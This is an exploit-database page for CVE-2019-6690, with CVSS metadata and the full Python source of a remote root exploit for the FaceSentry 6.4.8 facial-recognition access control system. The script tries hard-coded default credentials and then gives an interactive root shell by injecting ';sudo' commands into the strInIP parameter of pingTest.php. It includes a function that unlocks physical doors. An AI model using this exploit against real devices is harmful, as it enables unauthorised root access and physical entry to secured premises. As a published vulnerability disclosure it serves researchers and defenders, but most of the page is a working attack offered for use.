Exploitalert - Database of Exploits

FaceSentry Access Control System 6.4.8 Remote Root

CVE	Category	Price	Severity
CVE-2019-6690	CWE-287	$10,000	Critical

Author	Risk	Exploitation Type	Date
AdministratorX	High	Remote	2019-07-02

CPE
cpe:cpe:/a:matrix-software:facesentry:6.4.8

CVSS	EPSS	EPSSP
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H	0.03659	0.63415

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	High	PR	The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2019070014

FaceSentry Access Control System 6.4.8 Remote Root

#!/usr/bin/env python # -*- coding: utf-8 -*- # # # FaceSentry Access Control System 6.4.8 Remote Root Exploit # # # Vendor: iWT Ltd. # Product web page: http://www.iwt.com.hk # Affected version: Firmware 6.4.8 build 264 (Algorithm A16) # Firmware 5.7.2 build 568 (Algorithm A14) # Firmware 5.7.0 build 539 (Algorithm A14) # # Summary: FaceSentry 5AN is a revolutionary smart identity # management appliance that offers entry via biometric face # identification, contactless smart card, staff ID, or QR-code. # The QR-code upgrade allows you to share an eKey with guests # while you're away from your Office and monitor all activity # via the web administration tool. Powered by standard PoE # (Power over Ethernet), FaceSEntry 5AN can be installed in # minutes with only 6 screws. FaceSentry 5AN is a true enterprise # grade access control or time-and-attendance appliance. # # Desc: FaceSentry suffers from an authenticated OS command # injection vulnerability using default credentials. This can # be exploited to inject and execute arbitrary shell commands # as the root user via the 'strInIP' POST parameter in pingTest # PHP script. # # ============================================================== # /pingTest.php: # -------------- # 8: if (!isAuth('TestTools','R')){ # 9: echo "No Permission"; # 10: include("footer.php"); # 11: exit; # 12: } # 13: # 14: if(isset($_POST["strInIP"])){ # 15: $strInIP = $_POST["strInIP"]; # 16: }else{ # 17: $strInIP = ""; # 18: } # 19: # 20: $strOperationResult = ""; # 21: if ($strInIP != ""){ # 22: # 23: $out = array(); # 24: exec("sudo ping -c 4 $strInIP",$out); # 25: $result = ""; # 26: foreach($out as $line){ # 27: $result = $result.$line."<br>"; # 28: } # ============================================================== # # Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus) # Linux 3.4.113-sun8i (armv7l) # PHP/7.0.30-0ubuntu0.16.04.1 # PHP/7.0.22-0ubuntu0.16.04.1 # lighttpd/1.4.35 # Armbian 5.38 # Sunxi Linux (sun8i generation) # Orange Pi PC + # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5525 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php # # # 28.05.2019 # import datetime########INITIALIZE import urllib2#########BIOMETRICS import urllib##########FACIAL.REC import time############OGNITION.S import sys##(.)###(.)##YSTEM.DOOR import re#######O######UNLOCKED.A import os#######_######CCESS.GRAN import io######(_)#####TED.0B1000 import py##############1.11111011 from cookielib import CookieJar global pajton pajton = os.path.basename(sys.argv[0]) def usage(): if len(sys.argv) < 2: print '[+] Usage: ./' + pajton + ' <ip>\n' sys.exit() def auth(): brojac = 0 usernames = [ 'admin', 'user', 'administrator' ] # case sensitive passwords = [ '123', '123', '123456' ] while brojac < 3: podatoci = { 'strInLogin' : usernames[brojac], 'strInPassword' : passwords[brojac], 'saveLogin' : '1', 'saveFor' : '168' } # 7 days print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac] nesto_encode = urllib.urlencode(podatoci) ajde.open('http://' + target + '/login.php', nesto_encode) check = ajde.open('http://' + target + '/sentryInfo.php') dool = re.search(r'Hardware Key', check.read()) if dool: print '[+] That worked!' break else: brojac += 1 if brojac == 3: print '[!] Ah ah ah. You didn\'t say the magic word!' sys.exit() def door(): unlock = raw_input('[*] Unlock door No.: ') # default door number = 0 try: br = int(unlock) panel = { 'strInAction' : 'openDoor', 'strInPanelNo' : br, 'strInRestartAction' : '', 'strPanelIDRestart' : '', 'strPanelRestartAction' : '' } nesto_encode = urllib.urlencode(panel) ajde.open('http://' + target + '/openDoor.php', nesto_encode) print '[+] Door ' + unlock + ' is unlocked!' except ValueError: print '[!] Only values from 0 to 8 are valid.' door() def main(): if os.name == 'posix': os.system('clear') if os.name == 'nt': os.system('cls') vremetodeneska = datetime.datetime.now() kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S') print 'Starting exploit at ' + kd print ''' FaceSentry Access Control System Remote Root Exploit Zero Science Lab www.zeroscience.mk ZSL-2019-5525 ''' usage() tegla = CookieJar() global ajde, target target = sys.argv[1] ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla)) auth() raw_input('\n[*] Press [ENTER] to land... ') print '[+] Entering interactive (web)shell...' time.sleep(1) print while True: try: cmd = raw_input('root@facesentry:~# ') if 'exit' in cmd.strip(): print '[+] Take care now, bye bye then!' break if 'door' in cmd.strip(): door() continue podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd nesto_encode = urllib.urlencode(podatoci) r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode) pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read()) x = pattern.groups()[0].strip() y = x.replace('<br>', '\n') print y.strip() except Exception as i: print '[-] Error: ' + i.message pass except KeyboardInterrupt as k: print '\n[+] Interrupter!' sys.exit() sys.exit() if __name__ == "__main__": main()

Impressum